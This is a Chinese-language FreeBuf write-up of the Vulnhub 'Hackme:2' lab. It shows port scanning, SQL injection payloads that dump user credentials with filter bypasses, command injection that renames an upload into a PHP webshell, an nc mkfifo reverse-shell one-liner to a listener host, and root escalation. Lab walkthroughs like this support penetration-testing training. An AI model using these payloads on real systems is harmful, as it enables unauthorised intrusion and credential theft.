freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub Hackme:2
2021-01-28 22:42:42

Hackme:2

靶场搭建查看靶场能都正常运行

靶场链接
图片.png

主机发现与端口扫描

使用nmap获取主机的ip与详细的开放端口信息

nmap 192.168.1.0/24
nmap -sS -sV -p- -A 192.168.1.105  //获取主机的详细信息

图片.png

访问80端口发现是一个登录界面尝试使用万能密码
图片.png
登陆失败,注册一个新用户进行登录

name:xiaobai
password:xiaobai

图片.png
登陆之后发现这是一个书籍信息查询页面什么信息都不输入的时候会显示所有数据信息

图片.png

SQL注入

猜测可能勋在SQL注入
语句为:select * from books where book_name like '".$input."%'; "
可以构建查询语句:Windows%' and '123 ' like '1
完整语句为:select * from books where book_name like '"Windows%' and '123 ' like '1 ."%'; "

图片.png

正常回显
当将and后面改为1234时无法正常回显超出字段

图片.png
尝试查询数据库信息发现没有回显可能空格被过滤,接下来尝试使用/**/来代替空格
正常回显
图片.png

接下来通过burpsuit进行抓包修改注入信息

获取数据库:Windows%'/**/union/**/select/**/database(),'2','3/**/--/**/

图片.png

获取表:Windows%'/**/union/**/select/**/group_concat(table_name),'2','3'/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'webapp

图片.png

获取列: Windows%'/**/union/**/select/**/group_concat(column_name),'2','3'/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'users'and/**/table_schema/**/like/**/'webapp

图片.png

获取字段:Windows%' /**/union /**/select/**/group_concat( user), '2', group_concat(pasword) /**/from/**/users/**/where/**/'1'/**/like/**/'

图片.png

通过MD5解密获取密码
用户名:supermadin
密码:Uncrackable

上传webshell

用破解获取的账号和密码重新登陆
图片.png

发现可以上传文件
图片.png

不能上传php文件尝试绕过
查看能否通过命令获取信息,发现引号''被过滤,尝试使用反引号``命令成功执行
图片.png

图片.png

通过cat命令获取文件上传路径

`cat < welcomeadmin.php`

图片.png

这是文件上传的路径
因为不能上传php文件我们可以通过命令修改路径中的文件将文件后缀改成php文件

system('mv$IFS/var/www/html/uploads/year2020/web.png$IFS/var/www/html/uploads/year2020/web.php')

文件存在

图片.png

通过命令修改
图片.png

成功修改文件

图片.png

使用哥斯拉进行连接
图片.png
使用命令反弹shell,在kali上使用nc进行监听

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.106 1234 >/tmp/f

成功连接shell,获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

图片.png

通过find命令查看能否获取一些信息

图片.png

发现该文件执行之后可以直接提权获取root权限
提权成功

图片.png

# 渗透测试
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者